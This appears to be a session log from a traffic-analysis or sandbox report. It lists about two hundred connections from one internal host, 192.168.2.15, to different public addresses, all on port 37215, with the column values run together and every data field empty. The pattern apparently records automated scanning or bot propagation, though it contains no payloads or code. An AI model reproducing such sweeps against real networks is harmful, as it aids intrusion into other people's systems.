                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23780192.168.2.1559306156.56.89.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23781192.168.2.1544696156.32.206.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23782192.168.2.1540486156.34.198.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23783192.168.2.1536364156.54.186.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23784192.168.2.1535450156.234.40.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23785192.168.2.1538186156.60.189.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23786192.168.2.1557346156.250.208.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23787192.168.2.1551942156.224.169.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23788192.168.2.1536348156.105.17.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23789192.168.2.1554126156.17.92.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23790192.168.2.1550812156.23.162.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23791192.168.2.1544288156.75.94.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23792192.168.2.1542560156.63.74.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23793192.168.2.1539770156.50.126.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23794192.168.2.1557406156.6.27.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23795192.168.2.1559712156.23.110.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23796192.168.2.1537772156.190.99.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23797192.168.2.1554370156.220.219.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23798192.168.2.1550342156.199.159.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23799192.168.2.1540504156.29.126.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23800192.168.2.1546338156.68.176.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23801192.168.2.1543790156.142.65.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23802192.168.2.1538534156.179.255.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23803192.168.2.1541342156.126.219.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23804192.168.2.1533152156.202.175.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23805192.168.2.1540812156.150.139.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23806192.168.2.1539636156.9.177.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23807192.168.2.1546004156.142.88.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23808192.168.2.1546638156.9.26.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23809192.168.2.1539340156.34.0.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23810192.168.2.1549988156.16.100.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23811192.168.2.1547828156.153.26.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23812192.168.2.1551450156.223.20.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23813192.168.2.1544494156.9.70.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23814192.168.2.1556900156.138.59.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23815192.168.2.1537146156.44.14.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23816192.168.2.1546118156.251.143.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23817192.168.2.1537912156.56.52.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23818192.168.2.1547908156.35.14.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23819192.168.2.1536994156.249.196.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23820192.168.2.1539612156.16.195.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23821192.168.2.1560662156.227.233.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23822192.168.2.1548436156.1.255.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23823192.168.2.1540152156.60.179.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23824192.168.2.1546022156.4.211.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23825192.168.2.1543474156.25.227.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23826192.168.2.1536046156.237.71.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23827192.168.2.1540952156.53.163.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23828192.168.2.1555864156.211.245.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23829192.168.2.1544082156.149.181.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23830192.168.2.1541760156.90.108.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23831192.168.2.1560932156.86.227.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23832192.168.2.1556776156.123.175.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23833192.168.2.155465241.134.109.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23834192.168.2.154242641.176.49.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23835192.168.2.154674441.198.96.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23836192.168.2.155933841.68.186.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23837192.168.2.155940441.18.239.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23838192.168.2.154462041.167.133.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23839192.168.2.155248641.217.17.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23840192.168.2.154932241.61.210.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23841192.168.2.155771841.2.154.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23842192.168.2.155756241.171.51.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23843192.168.2.155038041.144.3.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23844192.168.2.155960041.39.165.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23845192.168.2.154135641.140.124.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23846192.168.2.153735441.197.147.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23847192.168.2.153829041.200.219.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23848192.168.2.153383641.217.244.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23849192.168.2.155633441.251.189.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23850192.168.2.155088641.245.13.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23851192.168.2.155160241.208.211.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23852192.168.2.154763041.129.37.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23853192.168.2.154745641.73.171.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23854192.168.2.154406641.227.104.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23855192.168.2.154631041.200.19.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23856192.168.2.155017441.248.141.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23857192.168.2.153304241.125.89.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23858192.168.2.155548641.187.75.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23859192.168.2.155844641.151.147.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23860192.168.2.154855441.55.192.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23861192.168.2.154232041.3.73.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23862192.168.2.155738241.16.93.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23863192.168.2.155705841.61.208.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23864192.168.2.154115241.67.222.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23865192.168.2.154843041.175.194.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23866192.168.2.154696641.173.5.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23867192.168.2.153810641.41.219.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23868192.168.2.154942441.54.234.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23869192.168.2.153818641.170.186.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23870192.168.2.155614841.232.161.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23871192.168.2.154832641.158.122.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23872192.168.2.154145241.239.178.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23873192.168.2.154070041.239.62.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23874192.168.2.155670641.152.139.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23875192.168.2.155616241.75.68.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23876192.168.2.155543641.205.154.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23877192.168.2.153714241.0.76.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23878192.168.2.154296841.28.235.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23879192.168.2.154445241.79.120.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23880192.168.2.154460641.29.154.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23881192.168.2.155449441.158.142.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23882192.168.2.155824041.33.75.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23883192.168.2.153696841.58.136.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23884192.168.2.154169441.155.45.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23885192.168.2.153671241.72.171.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23886192.168.2.154206641.19.245.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23887192.168.2.155966841.241.31.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23888192.168.2.155678841.154.86.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23889192.168.2.155386641.26.164.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23890192.168.2.154973641.12.138.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23891192.168.2.154411641.160.107.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23892192.168.2.155241841.121.54.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23893192.168.2.155576241.45.80.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23894192.168.2.155209041.170.199.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23895192.168.2.153617841.210.163.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23896192.168.2.154345841.122.4.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23897192.168.2.154447441.160.218.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23898192.168.2.154576041.17.62.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23899192.168.2.155389841.106.220.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23900192.168.2.154622441.222.159.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23901192.168.2.156024641.9.80.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23902192.168.2.153755241.7.195.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23903192.168.2.153292241.222.8.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23904192.168.2.153527441.194.201.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23905192.168.2.153323641.210.4.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23906192.168.2.153513641.29.61.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23907192.168.2.153443041.22.251.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23908192.168.2.155568441.170.186.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23909192.168.2.154328441.12.103.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23910192.168.2.153853641.90.14.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23911192.168.2.155149041.129.228.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23912192.168.2.154094641.34.12.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23913192.168.2.155217241.181.148.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23914192.168.2.154899041.155.146.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23915192.168.2.154970241.194.164.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23916192.168.2.153618241.214.101.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23917192.168.2.153414441.104.18.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23918192.168.2.154392441.125.153.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23919192.168.2.155706841.177.51.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23920192.168.2.154697441.30.205.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23921192.168.2.155007641.154.192.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23922192.168.2.155106041.213.137.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23923192.168.2.155999041.159.184.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23924192.168.2.154888041.163.175.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23925192.168.2.154867241.116.135.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23926192.168.2.154823241.112.21.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23927192.168.2.155896641.142.210.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23928192.168.2.153747641.115.68.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23929192.168.2.154393841.82.152.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23930192.168.2.154675841.106.175.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23931192.168.2.153572041.26.14.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23932192.168.2.154089441.68.176.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23933192.168.2.155466441.236.200.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23934192.168.2.154096041.156.116.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23935192.168.2.155921241.239.103.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23936192.168.2.153783041.208.162.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23937192.168.2.154439241.2.156.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23938192.168.2.154235041.5.90.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23939192.168.2.154216041.47.12.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23940192.168.2.153938241.93.89.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23941192.168.2.156015641.69.121.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23942192.168.2.156087641.54.71.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23943192.168.2.155927841.131.59.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23944192.168.2.153745441.12.172.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23945192.168.2.155795241.95.116.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23946192.168.2.155296041.79.148.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23947192.168.2.153960241.213.76.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23948192.168.2.153886841.53.100.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23949192.168.2.155271041.30.206.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23950192.168.2.154150641.137.194.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23951192.168.2.153997241.54.170.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23952192.168.2.155736841.216.49.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23953192.168.2.153780441.195.142.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23954192.168.2.155774041.250.72.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23955192.168.2.153652041.25.15.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23956192.168.2.154829241.121.124.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23957192.168.2.153833041.13.31.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23958192.168.2.154449241.251.117.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23959192.168.2.156044841.15.172.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23960192.168.2.154030241.217.15.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23961192.168.2.153815241.43.202.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23962192.168.2.155077041.121.18.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23963192.168.2.153676241.28.142.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23964192.168.2.155421241.144.248.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23965192.168.2.155148441.2.90.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23966192.168.2.153400441.83.219.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23967192.168.2.155013041.211.136.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23968192.168.2.154197641.60.252.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23969192.168.2.155888641.184.117.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23970192.168.2.153513041.208.238.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23971192.168.2.153758241.213.193.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23972192.168.2.154929641.76.138.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23973192.168.2.154369841.225.120.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23974192.168.2.153420041.10.128.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23975192.168.2.154930241.254.216.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23976192.168.2.153444241.99.242.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23977192.168.2.155593641.124.3.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23978192.168.2.153595241.250.61.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23979192.168.2.154501041.217.117.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23980192.168.2.155055841.236.8.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23981192.168.2.155010241.217.44.25237215
                                                                            TimestampBytes transferredDirectionData


